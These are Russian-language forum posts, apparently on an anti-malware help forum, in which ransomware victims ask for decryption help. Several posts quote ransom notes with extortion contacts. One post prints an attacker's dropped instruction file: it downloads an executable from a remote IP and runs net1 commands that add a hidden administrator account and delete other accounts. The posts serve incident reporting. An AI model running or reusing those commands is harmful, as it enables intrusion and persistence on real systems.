Поиск

Доброго дня! Большая часть файлов в системе зашифрована. Провел чистку с использованием KVRT, затем CureIt. дроппер imonset.exe+ibhost, исполняемые файлы шифровальщика сохранил отдельно. Систему, с тех пор как вручную остановил процесс шифрования, не перегружал. Готов предоставить любые логи, файлы. Прошу профессионалов помочь с расшифровкой, надеюсь, что это возможно. Заранее Вам признателен. Жду инструкций. С уважением, Борис

Добрый день. На домашнем компьютере зашифровались файлы и стали недоступны. Скорее всего это какой-то BTCWare Компьютер проганял CureIt ничего не находит. Наверное вирус леквидировался сам но зашифровки остались. В корне диска появился файл с названием ! FILES ENCRYPTED.txt текст файла: Возможно такое расшифровать? Все файлы имеют такой формат имени и расширения типа файлов: Samsung KNOX.DOCX.[unlocksupp@airmail.cc or BM-2cTVHx6b7RYhJ9gGKZn6yTuBpBBq3LHRkz@bitmessage.ch]-id-1E08.wallet Спасибо. Жду дальнейших инструкций. CollectionLog-2018.01.17-12.59.zip

При включении сервера зашифровались все файлы ( несистемные) . Комп не перезагружали, сохранился скрипт, и программа шифровальщик. Высылаю логи, программу и скрипт, и зашифрованый файл CollectionLog-2017.11.16-12.57.zip Договор водоснаб населения.doc.helper05@cock.li-id-1080.rar

Как лечить? CollectionLog-2017.10.16-10.53.zip

Доброго времени суток! Прошу о помощи, вирус-шифровальщик, файлы по регламенту в приложении. Скажите, пожалуйста, можно ли восстановить файлы, есть ли дешифратор? В приложении файл с требованием, пара зашифрованных файлов в архиве 1 Спасибо! CollectionLog-2017.10.18-14.38.zip !! RETURN FILES !!.txt 1.zip

Сегодня 18.10.2017 в 11:50 была произведена шифровка всех данных на сервере. Причем за ним никто не работает, он тихонько стоит себе в углу, но при этом подключен к интернету. Я уж не знаю каким образом могла произойти шифровка, на нем ничего не скачивалось и не открывалось. Помогите если возможно в дешифровке. Какую информацию предоставить для анализа?

Здравствуйте, Есть ли возможность расшифровать сабж? В аттаче архив с четырьмя файлами: два зашифрованные + два чистые оригиналы. Большое спасибо.

Доброго дня. У меня возникла аналогичная проблема с шифрованием файлов. Прошу помощи. CollectionLog-2017.10.16-09.51.zip

На компе стоит Kaspersky Small Office Security 5, но каким-то образом в систему проник вирус-шифровальщик вымогатель, который зашифровал файлы 1с с расширением: [aversia@tuta.io]-id-0.payday. Как избавится от этой мерзости?

Добрый день! Поймал шифровальщик, подскажите нет ли готового решения для расшифровки информации?

Запустился вирус ночью и зашифровал файлы не только на локальном компе но и расшареные папки на серверах. Оставив после себя файлы с расширением [aversia@tuta.io]-id-0.payday CollectionLog-2017.10.05-17.27.zip

Добрый день, есть файл шифрованный вирусом есть чистый. Есть сам вирус. Как на вашем волшебном форуме прикрепить файл? Все файлы в пакете. Нужна помощь по расшифровке.!!! Прикрепленные файлы. Все что есть., логов сбросить не могу. Пока не могу.

Добрый день! Поймал шифровальщик, подскажите нет ли готового решения для расшифровки информации? Файл с примером прикрепляю. Отчет.xls.aversia@tuta.io-id-0.payday.7z

Здравствуйте Заражён ноутбук Acer. Ноутбук использовался в качестве кассы в кафе, для формирования чеков и отчётов за день. Соответственно БД и ПО для кассы зашифрованы. Система работает нормально. Вероятная причина заражения - слабый пароль на RDP. Можно ли чем-нибудь помочь? CollectionLog-2017.09.05-16.05.zip

Добрый день! Был заражен сервер вирусом "GRYPHON RANSOMWARE" 99% файлов оказались зашифрованы, так же было изменено расширение файлов на .[bagmet@india.com].gryphon Прилагаю файл с условиями дешифровки от создателей вируса (файл создан в каждой папке), зашифрованный файл, логи программы autoLogger Заранее спасибо за советы по дешифровке файлов! !## DECRYPT FILES ##!.txt User_for_1C.png.bagmet@india.com.zip CollectionLog-2017.08.18-17.09.zip

Добрый день, являюсь действующим пользователем KES 10 for Windows Рассказываю о всем, что случилось по порядку: 1)в пятницу 11/08/2017 освободил после рабочего дня был взломан по RDP компьютер 2)сегодня 14/08/2017 - при входе в систему было открыто окно mouse locker и просило ввести пароль 3)перезагрузил пароль и вышло сообщил в блокноте о требования 1 BTC за разблокировку с текстом: ============================== GRYPHON RANSOMWARE ============================== Your documents, photos, databases and other important files have been encrypted cryptographically strong, without the original key recovery is impossible! To decrypt your files you need to buy the special software - "GRYPHON DECRYPTER" Using another tools could corrupt your files, in case of using third party software we dont give guarantees that full recovery is possible so use it on your own risk. If you want to restore files, write us to the e-mail: payfordecrypt@qq.com In subject line write "encryption" and attach your ID in body of your message also attach to email 3 crypted files. (files have to be less than 2 MB) It is in your interest to respond as soon as possible to ensure the restoration of your files, because we wont keep your decryption keys at our server more than one week in interest of our security. Only in case you do not receive a response from the first email address withit 48 hours, please use this alternative email adress: crypthelp@qq.com Your personal identification number: Em3isyUPLDohYX8Osrj/kBiIRxo0OPPM4ygP4ZTsmv9yFFNISPzSr8hbby001BUl73/NS9IHa2ZRZ5LC /pF2a4SN0/SN+wlQRBUUGbNvwLpp/AJ7EQM/yTg3aXf4P+G3/UBuEt/dOkrIYI54hnKaM4xv1Xg73jmchmzsVYhvPGQ= ============================== GRYPHON RANSOMWARE ============================== посмотрел - все файлы на компьютере и все файлы на сетевых дисках зашифрованы и имеют формат [payfordecrypt@qq.com].gryphon 4)Увидел что антивирус выключен и ключ удален (KES 10 for Windows) 5)связался с вымогателями по почте они расшифровали один Фаил пример зашифрованного и расшифрованного файлов прилагаю 6)Выполнил проверку Kaspersky Virus Removal Tool 2015 - ничего не обнаружено 7)Логи с помощью AutoLogger собраны в приложении к теме 8)на всякий случай сделал логи программой Farbar Recovery Scan Tool (увидел в похожей теме https://forum.kasperskyclub.ru/index.php?showtopic=56686&hl=%2Bgryphon+%2Bransomware) Прошу оказать помощь в расшифровке файлов CollectionLog-2017.08.14-14.10.zip Логи Farbar Recovery Scan Tool.zip Пример зашифрованного и расшиврованного злоумышлиниками файла.zip

Проник на сервер и зашифровал все куда был доступ. Как он попал на сервер пока загадка. интересно что можно расшифровать текстовый файл !## DECRYPT FILES ##!.txt.id-7E89BC9F.[3048664056@qq.com].wallet утилитой esetcrysisdecryptor.exe в нем содержится ============================== GRYPHON RANSOMWARE ============================== Your documents, photos, databases and other important files have been encrypted cryptographically strong, without the original key recovery is impossible! To decrypt your files you need to buy the special software - "GRYPHON DECRYPTER" Using another tools could corrupt your files, in case of using third party software we dont give guarantees that full recovery is possible so use it on your own risk. If you want to restore files, write us to the e-mail: bagmet@india.com In subject line write "encryption" and attach your ID in body of your message also attach to email 3 crypted files. (files have to be less than 2 MB) It is in your interest to respond as soon as possible to ensure the restoration of your files, because we wont keep your decryption keys at our server more than one week in interest of our security. Only in case you do not receive a response from the first email address withit 48 hours, please use this alternative email adress: markevich@gmx.com Your personal identification number: rQjtJcA04YaVYeZc7xOgxqJ1Pw+NvmUnzYM0kBtT+XJNLx9T30/+qLUDVeaUnkg58CCReQlde96jvP1C GVDQNkKgqQzHSPLkkMByBd8XaglAFcFykSeOfUNmPz/WsFDcqmiGOm9NtfniM97uqhXaiZYqFZ5driSryh+DfE3JYRM= ============================== GRYPHON RANSOMWARE ============================== CollectionLog-2017.08.10-20.44.zip filestyumen.zip

Здравствуйте, в сетевой папке вирус-шифровальщик aleta зашифровал файлы, бесплатная утилита от Касперского не сработала, утилиты с форумов про этот вирус BTCware dekrupter и иже с ним не сработали. Посмотрите пожалуйста можно ли расшифровать файлы. Архив с зашифрованными файлами и их оригиналами прилагаю. файлы.zip

На одном из серверов, где не было антивируса, сработал шифровальщик aleta. Все данные в итоге удалось восстановить. Из интересного был найден файл ok[1].txt в системном профиле C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 Ниже его содержимое, могу предположить, что это ip-адрес командного сервера злоумышленников. [down] h__p://118.xxx.xxx.141:8888/ppsa.jpg c:\windows\Loginsas.exe 1 [cmd] net1 user IUSR_Servs ZxcvBMN,.1987&net1 user IUSR_Servs ZxcvBMN,.1987 /ad&net1 localgroup administrators IUSR_Servs /ad net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe del c:\windows\RichDllt.dll taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del echo 123>>1.txt

Обнаружил на сервере зашифрованные файлы, ко всем добавлено расширение [teroda@bigmir.net].master Вручную удалил подозрительные программы, после чего просканировал с помощью KVRT. Ничего не было найдено Зашифрованный файл - chart_current.bmp.teroda@bigmir.net.zip Предположительно оригинал из бэкапа - chart_current.zip Требование о деньгах - !#_RESTORE_FILES_#!.zip

Добрый день сегодня был зашефрван сервер, на сколько понимаю это обновллённы вирус (см. Ссылку на статью) BTCWare, пробежалсья по всем местам и его подчистил, осталось отшифровать файлы.. Буду очень блогодарен за вашу помощь. CollectionLog-2017-05-18.zip